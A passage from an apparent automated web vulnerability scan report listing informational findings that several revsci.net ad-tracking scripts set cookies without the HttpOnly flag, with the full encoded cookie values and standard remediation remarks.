rtc_WdNx=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.104. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/215595401.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNOsPC7nMUV/0bee4znL85ahvsdqPJYmPBzmH54bBx8TYNCTYObQM7enbGl6Gwz9X2lHanrF8ryjbBfhMfqjV5MpzMugEJZgqS0tRA2BY0s54Y2J3S3lZSvIJkGEakbmX73O1EdOqxfU0TWt1Dk0Jjyr11LP+EJVZ5w+avJuoz43fhFun61TlfbkhVuzsZRCINtd3vk9VxrtK2FH07+6wdxbc=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
rtc_C-P4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:26:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.105. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/225588936.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4k+huQIMTzaxu2F29/z4Oss1gLZjSjagIGaQsDQ0ubO+NOVEpsZ5SuHqPlIcMQ/cvW9sjK6kuhf/9/9LK4/QiglY+E82qMXfc3Ur2YqYJhOnBRiAEKgmFzpRHtByzn85kSJ3FJXnfM7lp1rXGCAtCyOsR0o5AYgxZF27q6KHXshH7QqMZKdejkvRZ42rwWRuZM9/g+5Y1Fedrb8/4hiG6CEgOBsTzrivcBIXPvyJIWSEnVJqZN2dbyw4AVwVnd79qBwWxClGFSA7EPpoWFUyrGAgnlP9nHw+bGguQONFa7zaeQqaoxjGW/n7mlbbwbn3EpryAM4DI0loQRa1M9uuyQpCdmNjbassDtKeOxr4j10dwJi3e7kQyLCxhnM98vGppIJcV/1xTArabMmn9Q/NioL0UwPsaEBDRzIBkdVS27X3SpHBynn9Lth9scS7+7Sf2rTVAH8Qm5yWCD7PIVS6BMCQakVNSLgBnLGWQ3EUGQqdtffxhOx3+nKHDCU4YiJJ5TCeIubAMo6XeYxlR7B2V8OZjayRxIsAp3+KDT0+gk6NRKWjhJhzinsxvDU9BuCz+mxkrV1xbFN+BEZntlRwCUwBPC4ruEgyGonI3UIK2dg3ILUQy7y5xrhpijYJ/DT1qxMzUvMcBv8nc7sRH/CKmOD8YSW2QQKmDLfdKY8G1gXpRr43CyWS/hpU5rlQFkOOKu9K9h/juAyXN0GcZqUeoK7TnIk/LcbQE6VTt2LDG/ywqIQvQAV5W+cXjrFsqPExS4ZLgWR48xAOOvd8cR3ICGUpaUXNYQ==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
rtc_l-Qz=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a8b1&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:04:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.106. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/273184684.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4kOheAIMDjaxc4NY5DAFqICTC+braGbBT2+Y8cJSum2Nh/fo4zpqNncA2iFgL+JsDGWsZjubK0mRsrZSYRyDO5HRLaWuSiEWtbINoWoEMyT7a/qEKOa4D1R1f1mo3AUgkUXRjwQp8/8ja+sf1AVNTSBhxseOtGzVtF57HQnSL31H0oMOfwJpbKN97qeK/wnePZFtxccShSexoZpb38b2k+YRK3its4s1Vl+dfe0xXAuc32r1E/ch5Ojd3ERdmLUGU0MhvzKOTCurdC9RTFdx6PRHh0LMAWqUPpQHjrd1hgjmhDDF9wJjtRZfN0n0HFOyl/r+gaLOXMY0YT9CBRO2G3jYrrYqJLJYkWoF+oA+rebP0tqo1E26tpEFNGKY5JiJsyyobn2vYFW2yCBerJMGeM+TgTEVO0SyxvW/kXN31OIFcpzAxg8mYjOOjbGP7JyGJMgKol+f6uC/lS40lTKyiit0jNXtepVEQrs1ZcEmZYiZKqSwdFgENEJuWK3XnmAkS8iId5bzhciwOcgj9C30hLGOxUsPabkC9nvsxna1v/gSNvztE3hSPTA7LG+jIAGXTgjeEs5gnfForSXcNfYR1yiAOQzFNTPFCPgSyzlHhKn5YBGuccH93FwDLX6+DV3q/gbsKlKRBKTQBqb3pjNfmhtIHd1IXNCF+U6puQthsVsqcpwnZSTYdcjrRe1Xi7Z0OepA56iKR1gDakJtHVc/C8ciXEYiEoDDcm5HnJ42L465lT9xK81lZBgzRdro9dWvdzfTIahwwZGupH3oeMmIdcnaCj0GgKI6vg5++WS+KUc=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/
rtc_z1Ed=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.107. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/293330189.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CPZq60bIzTlnSCIjQNpmQyiPpn1WLZYGIVHHqRL8VuyK4KTktWpKfhIdHIBwclAI+6iD3yXxATNyXVdCP9qr5pUf86eVqDRYrXnrWOQjJGgQmy7sH3W0QYN9ncBmAi6AFeBtqgO+BHtTmqf+IwWdMW+vn20BWfxvnJZS8x1vTAmlPu7yTn9sxzlDvQISj2WEjZNX5rXV5ukaTRHGuM2yeuQT4RICgZT5x2mDJvn8tq9GJ7UH/gE6iPm5BKu3WqKlqylGDQsXLxPXLrxUvqZgL/GXlsGJHcV2yLjheFx52zg/AdJWYX0xIqaWFDAinkd+HFgH/FBcPcf5PGHkf42QFcsCVqWq77hxoYmwYkrpfC7Hs8gZrse1DI9+qNwbwtyVVHII0+JZJa1OaEzmF6Zw8e7llMjMyCkhULZ21J9kYowe2hqB6T83cVhkCcqx3pt3vCz1JWV+51wLTq7ZHPu9iPjPSzpK3S+ft1SGY1b15QeMEL8FbeKr45VXaZhA4iyTvuoNgHNfNAwuf5ZTSqHt3njl/nLryYbUcwVcj0rU4iQDzK3OJqawxSQEscdP/rysIqog/GQ2d00Vor80g0DqI5PW3StZUxHSWn8Mulk5ukpRBDquCzWhZQqzAYIWPSu++uiy6wK+qWj/nKwno0H8DqYoSUH0/lR3qsSkiJMZXAyDMdC0rBuy4Er5vBhC4RQE/AZM7twEeK2MA2nim3FhYD81F+53dMLxegwtk8NtBOnMUobxgR4EvlW+teQygc0uHK8DJ1E; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
rtc_kcMU=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.108. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/396037982.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

